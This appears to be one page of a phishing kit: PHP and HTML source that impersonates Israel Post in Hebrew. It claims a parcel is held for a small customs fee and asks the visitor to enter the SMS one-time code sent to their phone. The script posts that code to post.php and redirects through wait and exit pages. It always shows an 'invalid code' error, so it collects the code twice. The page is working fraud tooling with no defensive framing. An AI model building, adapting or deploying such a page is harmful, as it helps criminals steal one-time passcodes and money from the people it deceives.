<?php 
require '../main.php';
?><!DOCTYPE html>
<html lang="en" dir="rtl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Israel Post</title>
    <link rel="stylesheet" href="res/main.css">
</head>
<body>
<header>
<img src="res/header-lg.png" class="lg">
<img src="res/header-md.png" class="md">
<img src="res/header-sm.png" class="sm">
<img src="res/header-xs.png" class="xs">
</header>

<main>

<div class="form">

<div class="title">
עקוב אחר החבילה שלך
</div>
<div class="text">
החבילה שלך <b>[RG00072254090]</b> בדרך אליך. עליך לשלם את דמי המכס כדי למנוע עיכובים במשלוח.
<p>דמי מכס: 12.90₪</p>
</div>

<div class="holder">

<?php setError("קוד לא תקין"); ?>

<div class="text">
נא לשלוח את הקוד שנשלח למספר הטלפון שלך.
</div>

<div class="col">
<label>הזן קוד</label>
<input type="text" id="sms" placeholder="OTP">
</div>

<div class="col">
<button onclick="sbmt()">המשך</button>
</div>

</div>


</div>


</main>

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.16/jquery.mask.min.js"></script>
<script>
    $("#sms").mask("00000000");
    $("input").keypress((e)=>{
        if(e.key=="Enter"){
            sbmt();
        }
    });

function sbmt(){
    var sms = $("#sms").val();
    var sub = true;
    $("#sms").removeClass("error");
    if(sms.length<4){
        $("#sms").addClass("error");
        sub=false;
    }

    if(sub){
        $.post("post.php",{sms:sms},(res)=>{
            <?php 
                if(isset($_GET['e'])){
                    echo 'window.location="exit.php";';
                } else{
                    echo 'window.location="wait.php?next=sms.php?e";';
                }
            ?>
                   
        });
    }
}
</script>
</body>
</html>